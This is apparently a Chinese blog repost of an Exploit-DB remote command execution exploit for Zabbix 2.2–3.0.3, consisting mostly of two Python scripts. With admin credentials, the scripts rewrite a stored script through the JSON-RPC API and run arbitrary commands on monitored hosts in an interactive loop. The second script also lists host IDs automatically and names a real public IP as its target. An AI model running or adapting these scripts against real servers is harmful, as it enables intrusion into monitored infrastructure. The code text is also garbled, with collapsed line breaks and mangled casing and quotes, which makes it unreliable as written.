Vulnerability Source: https://www.exploit-db.com/exploits/39937/
Attack cost: High
Hazard level: Low (password required for this hole)
Conditions of use: high-privileged User login required
Impact Range:2.2 < 3.0.3
Tips
This hole requires you to get a high-privileged account password, when you get the account password, into the background can also execute commands, using the API Json-rpc for the second scenario.
This exp is not perfect because HostID is not automatically acquired.
#!/usr/bin/env python# -*- coding: utf-8 -*-# exploit title: zabbix RCE with API JSON-RPC# Date: 06-06-2016# Exploit Author: alexander gurin# vendor homepage: http://www.zabbix.com# software link: Http://www.zabbix.com/download.php# Version: 2.2 - 3.0.3# Tested on: Linux (Debian, centos) # cve : n/aimport requestsimport jsonimport readlinezabix_root = ' http://192.168.66.2 ' ### zabbix ip-address url = zabix_root + '/api_jsonrpc.php ' ### don ' t editlogin = ' Admin ' ### zabbix login account password = ' Zabbix ' ### zabbix password password hostid = ' 10084 ' ### zabbix hostid need to specify the host of the command ### Authpayload = { &nbsP; " Jsonrpc " : " 2.0 ", " method " : " User.login ", " Params ": { ' user ': " "+login+" ", ' Password ': " "+ Password+ "", }, "auth" : None, "id" : 0,}headers = { ' Content-type ': ' Application/json ',}auth = requests.post (Url, data=json.dumps (payload), headers= (headers)) auth = Auth.json () while true:cmd = raw_input (' \033[41m[zabbix_cmd]>>: \033[0m ') if cmd == " : print " Result of last command: "if cmd == "Quit" : break### updatepayload = {"Jsonrpc": "2.0", "Method": " Script.update "," params ": { " Scriptid ": " 1 ", " command ": "+cmd+" "}," Auth " : auth[' result '], "id" : 0,}cmd_upd = requests.post (url, data=json.dumps (payload ), headers= (headers)) ### executepayload = {"Jsonrpc": "2.0", "Method": " Script.execute "," params ": { " Scriptid ": " 1 ", " HostID ": "+hostid+" "}," auth " : auth[' result ']," id " : 0,}cmd_exe = requests.post ( Url, data=json.dumps (payload), headers= (headers)) Cmd_exe = cmd_exe.json () print cmd_ exe["Result" ["value"]
Modified version auto get HostID
#!/usr/bin/env python2.7#coding=utf-8import jsonimport requestsurl = "/http 42.62.97.87/api_jsonrpc.php "header = {" Content-type ": " Application/json "}username = " Admin ' password = ' [email protected]# ' #get auth idpayload = { "Jsonrpc" : "2.0", "method" : "User.login", "params": { ' user ': "" +username+ "", ' password ': "+password+" ", }, "auth" : None, "id" : 0,}headers = { ' Content-type ': ' Application/json ',}auth = requests.post (URL, data=json.dumps (payload), headers= (headers)) Auth = auth.json () #get hostiddata = { "Jsonrpc ":" 2.0 ", " method ":" Host.get ", " params ":{ "Output": ["HostID", "name"], "Filter": {"host": "} }, " auth ":" "+auth[' result ']+" ", "id": 1,}hostid = requests.post (Url, data=json.dumps (data), headers= ( Headers) Hostid = hostid.json () print ' uid\tname ' for hid in hostid[' result ']: print hid[' HostID '],hid[' name '] #exec commandhostid = raw_input (' \033[41m[input_hostid]> >: \033[0m ') while true: cmd = raw_input (' \033[41m[zabbix_ cmd]>>: \033[0m ') if cmd == " : print " Result of last command: " if cmd == " quit : break ### update payload = { "Jsonrpc": "2.0", "Method": "Script.update", "params": { " Scriptid ": " 1 ", " command ": " " +cmd+ "" }, "auth " : auth[' result '], " id " : 0, } cmd_upd = requests.post (Url, data=json.dumps (payload ), headers= (headers)) ### execute payload = { "Jsonrpc": "2.0", " Method ": " Script.exeCute ", " params ": { "Scriptid": "1", "HostID": "+hostid+" " }, "auth" : auth[' result '], "id" : 0, } cmd_exe = requests.post (Url, data=json.dumps (payload), headers= (headers)) cmd_exe = cmd_exe.json () print cmd_exe["Result" ["Value"] if cmd == ' Quit ': break
650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M01/86/1F/wKiom1e1ZBPQJ-DnAABWBiMB9hs167.png "title=" Zabbix-rpc.png "alt=" Wkiom1e1zbpqj-dnaabwbimb9hs167.png "/>
This article is from the "Sanr" blog, make sure to keep this source http://0x007.blog.51cto.com/6330498/1839957
Zabbix 2.2 < 3.0.3-rce with API Json-rpc